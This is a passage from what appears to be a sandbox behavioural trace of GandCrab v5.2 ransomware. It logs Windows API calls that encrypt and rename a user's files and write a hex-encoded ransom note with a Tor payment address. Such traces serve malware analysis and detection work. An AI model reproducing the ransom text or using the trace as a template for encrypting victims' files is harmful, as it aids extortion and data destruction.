dwFlags=0x0) returned 1 [0072.980] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.980] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.980] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0072.980] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.980] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5036f8) returned 1 [0072.981] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.981] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0072.981] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.981] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0072.982] GetLastError () returned 0x0 [0072.982] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.982] CryptDestroyKey (hKey=0x5036f8) returned 1 [0072.982] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.982] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0072.982] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.982] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0072.983] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.983] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503938) returned 1 [0072.983] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.983] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0072.983] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.983] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0072.984] GetLastError () returned 0x0 [0072.984] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.984] CryptDestroyKey (hKey=0x503938) returned 1 [0072.984] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.984] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0072.984] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0072.984] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0072.984] ReadFile (in: hFile=0x2c4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ecb4*=0x1c8, lpOverlapped=0x0) returned 1 [0072.991] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffe38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.991] WriteFile (in: hFile=0x2c4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x1c8, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ec98*=0x1c8, lpOverlapped=0x0) returned 1 [0072.994] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.994] WriteFile (in: hFile=0x2c4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0072.996] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.000] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.000] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.000] CloseHandle (hObject=0x2c4) returned 1 [0073.002] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\credhist"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\credhist.titwmvjl"), dwFlags=0x1) returned 1 [0073.002] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.036] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0073.036] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0073.036] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0073.036] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\d2ca4a09d2ca4deb61a.lock" [0073.036] lstrlenW (lpString=".titwmvjl") returned 9 [0073.036] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\d2ca4a09d2ca4deb61a.lock") returned 80 [0073.036] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.037] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 89 [0073.037] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\d2ca4a09d2ca4deb61a.lock") returned 80 [0073.037] lstrlenW (lpString=".lock") returned 5 [0073.037] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.037] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0073.037] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.037] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.037] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0073.037] lstrcmpW (lpString1="S-1-5-21-1462094071-1423818996-289466292-1000", lpString2=".") returned 1 [0073.037] lstrcmpW (lpString1="S-1-5-21-1462094071-1423818996-289466292-1000", lpString2="..") returned 1 [0073.037] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="S-1-5-21-1462094071-1423818996-289466292-1000" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000" [0073.037] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\" [0073.037] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0073.038] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.038] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0073.038] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.038] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0073.038] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.038] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0073.038] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.038] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0073.038] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.038] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.039] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\\\TITWMVJL-DECRYPT.txt") returned 123 [0073.039] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0073.039] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x